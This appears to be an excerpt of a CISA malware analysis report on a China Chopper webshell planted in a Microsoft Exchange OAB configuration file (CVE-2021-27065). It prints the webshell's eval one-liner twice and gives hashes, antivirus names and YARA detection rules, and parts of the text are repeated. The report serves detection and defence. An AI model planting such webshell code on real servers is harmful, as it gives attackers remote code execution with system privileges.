This artifact is a Microsoft Exchange OAB virtual directory configuration file. The OAB VD is the IIS virtual directory through which Outlook clients download offline address lists. In this file the OAB ExternalUrl property has been modified by a remote operator to carry a "China Chopper" webshell, in a likely attempt to gain unauthorized, on-demand remote code execution against the Exchange server. Because the file carries an .aspx extension, once it sits in a web-accessible directory ASP.NET compiles and runs the server-side JScript embedded in the ExternalUrl value each time the page is requested, so the operator can submit arbitrary code to the server simply by issuing HTTP requests to this page.

In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:

---Begin Webshell---
hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["xncSsoZepUEz"],"unsafe");)</script>
---End Webshell---

The script passes whatever string the client supplies in the request parameter named "xncSsoZepUEz" to the JScript eval function; the "unsafe" argument runs the evaluated code outside the restricted security context JScript .NET otherwise applies to eval, so it can use the full .NET Framework. The parameter name is the only gate, a shared secret rather than authentication: a request without a parameter of that name gives eval nothing to run, while anyone who knows the name can execute arbitrary code with the privileges of the IIS worker process hosting the page, which on Exchange servers is Local System.

Screenshots
Figure 5. -

1435e7871e32779a81e28aa9b6fa57949439220527ed3b3fb83a1c0699f376e3

Tags

trojan, webshell

Details
Name cBP0VKYG.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 d67c8e0b4489979922c5acfff7211186
SHA1 3179101b5d8484a3cb316fb22e4e6aaa60eda94d
SHA256 1435e7871e32779a81e28aa9b6fa57949439220527ed3b3fb83a1c0699f376e3
SHA512 97e068cab67cb8b597c052ef4905cffc506d97fe1069f9195dbcc882b4808088e83ac37f430f2d43096ff40a8db1e03a133a54ae2fdaf22a33bbfb393a395e57
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaEDVMr6j71idfhphE5gh62E4ONF0qTenf:kNrdepN1BXS0zaM5QZphEws4ONF0q6
Entropy 4.643343
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.E4D70A09
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.E4D70A09 (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.E4D70A09
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
           $s1 = { 65 76 61 6C 28 }
           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       condition:
           $s0 or ($s1 and $s2) or ($s3 and $s4)
    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
       condition:
           $s0 and $s1 and $s2
    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB virtual directory configuration file. The OAB VD is the IIS virtual directory through which Outlook clients download offline address lists. In this file the OAB ExternalUrl property has been modified by a remote operator to carry a "China Chopper" webshell, in a likely attempt to gain unauthorized, on-demand remote code execution against the Exchange server. Because the file carries an .aspx extension, once it sits in a web-accessible directory ASP.NET compiles and runs the server-side JScript embedded in the ExternalUrl value each time the page is requested, so the operator can submit arbitrary code to the server simply by issuing HTTP requests to this page.

In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:

---Begin Webshell---
hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["fYQMESigLnP1"],"unsafe");)</script>
---End Webshell---

The script passes whatever string the client supplies in the request parameter named "fYQMESigLnP1" to the JScript eval function; the "unsafe" argument runs the evaluated code outside the restricted security context JScript .NET otherwise applies to eval, so it can use the full .NET Framework. The parameter name is the only gate, a shared secret rather than authentication: a request without a parameter of that name gives eval nothing to run, while anyone who knows the name can execute arbitrary code with the privileges of the IIS worker process hosting the page, which on Exchange servers is Local System.

Screenshots